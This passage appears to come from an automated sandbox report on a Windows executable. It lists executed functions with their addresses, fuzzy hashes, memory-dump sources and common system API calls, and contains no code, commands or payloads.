                                                                                                                                                                                                                    • Opcode ID: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
                                                                                                                                                                                                                    • Instruction ID: 970f36240a8ca2ff0bd39d901e14e9bfccdb42fb1abd6044772de422f864a376
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC113A66B19A4582EB449F16E0803796360EB88FD5F5C5732DE1E9B3A1CF7ED4A0C300
                                                                                                                                                                                                                    Function 00007FF656CF0414 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
                                                                                                                                                                                                                    • Instruction ID: 15596cbc711c600195449a3bc105a51ac745ea66b422c20a94c0361dd26ea89d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9011A3F2A0C64786EA059F50D4512BDBB71EF90750F984232E65D562E6CFBED404CB00
                                                                                                                                                                                                                    Function 00007FF656CE48EC Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                    • Opcode ID: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
                                                                                                                                                                                                                    • Instruction ID: 377bb642f425f7ddf617c9cb037b23dce3cb667ccd591a82d4842c301ea5a96f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A0184A1E0820741FE26AA65951337922705F94774F2D5330E92DFB2D3CE2EEC01C311
                                                                                                                                                                                                                    Function 00007FF656CE4970 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                    • Opcode ID: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
                                                                                                                                                                                                                    • Instruction ID: a02c186e62ea990cc7ceab2cbe51da2df814d7ce7055950d8e57fab1fcc2c551
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20F0B4A1E0C24342EA26A7B5A50317E23B89F40750F2C9230F95EE62D7CE3EEC41C701
                                                                                                                                                                                                                    Function 00007FF656CB652C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CE4970: _invalid_parameter_noinfo.LIBCMT ref: 00007FF656CE4999
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF656CFC8FE), ref: 00007FF656CB656F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLibrary_invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3938577545-0
                                                                                                                                                                                                                    • Opcode ID: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
                                                                                                                                                                                                                    • Instruction ID: 8cc8de232ddbcad656baed57174e5cc354faf5b1b47a72c65e8d8317a5e394a7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5BF05E92A09A0582FF19CF76D4653383370BB58F08F580530CA4E9A19ACF2DD8A8C345
                                                                                                                                                                                                                    Function 00007FF656CD4C68 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF656CD4C5C
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CD5600: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF656CD5609
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CD5600: _CxxThrowException.LIBVCRUNTIME ref: 00007FF656CD561A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Concurrency::cancel_current_taskExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1680350287-0
                                                                                                                                                                                                                    • Opcode ID: ad801c2c3584bf2bf8cc338021b3875574537b688fb6d0f9b5ce0c86e08b9346
                                                                                                                                                                                                                    • Instruction ID: 9d1160853e89c708da06cf86c69916f416a8425447ca6f616b2ed77e30c17a43
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ad801c2c3584bf2bf8cc338021b3875574537b688fb6d0f9b5ce0c86e08b9346
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9FE08CC0F8D18705FF68766145461B901700F88331E5C9BB0DA3EEC2C3BC0EB459C100
                                                                                                                                                                                                                    Function 00007FF656D2B334 Relevance: 1.5, APIs: 1, Instructions: 21fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                                                                    • Opcode ID: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
                                                                                                                                                                                                                    • Instruction ID: bcdc3a86e709b78ac143398e10c1043761f69654561fbe5a43657837025a25d1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92E03922608A9182D720CB06F44031AE370FB89BC8F584635EF8C57B19CF7DD591CB80
                                                                                                                                                                                                                    Function 00007FF656CB3EB4 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LongNamePath
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 82841172-0
                                                                                                                                                                                                                    • Opcode ID: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
                                                                                                                                                                                                                    • Instruction ID: 8a5d48ccf22db20e47dae2d0911a3143eb5df1e7beb65f5a81a4736051f04de5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2E0D862B0874185DB61DB25E584398A371FB8C7C4F484131EE8C8375ACD6CC5C4CB00
                                                                                                                                                                                                                    Function 00007FF656CB5D88 Relevance: 1.5, APIs: 1, Instructions: 19windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: IconNotifyShell_
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1144537725-0
                                                                                                                                                                                                                    • Opcode ID: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
                                                                                                                                                                                                                    • Instruction ID: 261b90d405f3b185a5fd50d83f48b298f6824cc35d78a3eb623c23d1cf9002ff
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57F08CB1A1DB8287E7619B64E4043697BA4F78930CF884239D18D96395CE3ED345CF00
                                                                                                                                                                                                                    Function 00007FF656CB1080 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Open_onexit
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3030063568-0
                                                                                                                                                                                                                    • Opcode ID: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
                                                                                                                                                                                                                    • Instruction ID: 9f8a91fc84c126aaacc39df70ed1049ea13534c995f05fb64eef81a0bdd6270a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4E012B0F9E58B80EF04BB69D88517453B16F5530AF889B36C50CE63A1EE2DD295CB10
                                                                                                                                                                                                                    Function 00007FF656CB10E8 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Process$CurrentVersionWow64_onexit
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2932345936-0
                                                                                                                                                                                                                    • Opcode ID: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
                                                                                                                                                                                                                    • Instruction ID: 7b579d7e20cf63faaaad986323011635a21060c1856142a25b20b24d7ca8749f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACC01250EA90CB80E70873B548860B442B04FA5304F980276C20DD46D2DD1D51E6CA11
                                                                                                                                                                                                                    Function 00007FF656CB1048 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _onexit
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 572287377-0
                                                                                                                                                                                                                    • Opcode ID: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
                                                                                                                                                                                                                    • Instruction ID: 8948b71e540244bea2d939607eed1151b0a95b37f8dbe248699f42d3b66568d5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3C01250E9908B81EA0873B5888607401B04FA9300FD846B6C10DE46D2DD1E51E6CB51
                                                                                                                                                                                                                    Function 00007FF656CB1064 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _onexit
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 572287377-0
                                                                                                                                                                                                                    • Opcode ID: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
                                                                                                                                                                                                                    • Instruction ID: 96443c8d810810ce4d51b7c703119f4f1b59a89a0b120c76f7457efb35091cf0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33C01251EAA08B80E60873B58C860B801B00FE5300FD80276C10DD52D2DD1D61E6CB11
                                                                                                                                                                                                                    Function 00007FF656D37E48 Relevance: 1.4, APIs: 1, Instructions: 163COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1452528299-0
                                                                                                                                                                                                                    • Opcode ID: b1ea28e244f60b4af54ff34aaaf102a183879d86c5d4002b95e89690f8712e5a
                                                                                                                                                                                                                    • Instruction ID: 36577ee468afd77ba1bb06e91e762273111b485e3caaa5a7a3e15e75dd35b740
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1ea28e244f60b4af54ff34aaaf102a183879d86c5d4002b95e89690f8712e5a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68714A22B08A4285EB50EF66D4903FD2370FB84B84F484636DE5EA77A6CF3AE445C350
                                                                                                                                                                                                                    Function 00007FF656CEC51C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AllocHeap
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4292702814-0
                                                                                                                                                                                                                    • Opcode ID: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
                                                                                                                                                                                                                    • Instruction ID: 16e9b7deecfc1e6d85a353b9cb7b8beb4b9545c1a079d3859a1ebccff1616d8b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8F0FE91B4A24785FE66A661581227961B05F84BA0F5C4734DC3FEA2C1DE5EE840E610

                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                    Function 00007FF656D456A0 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 476filecommemoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
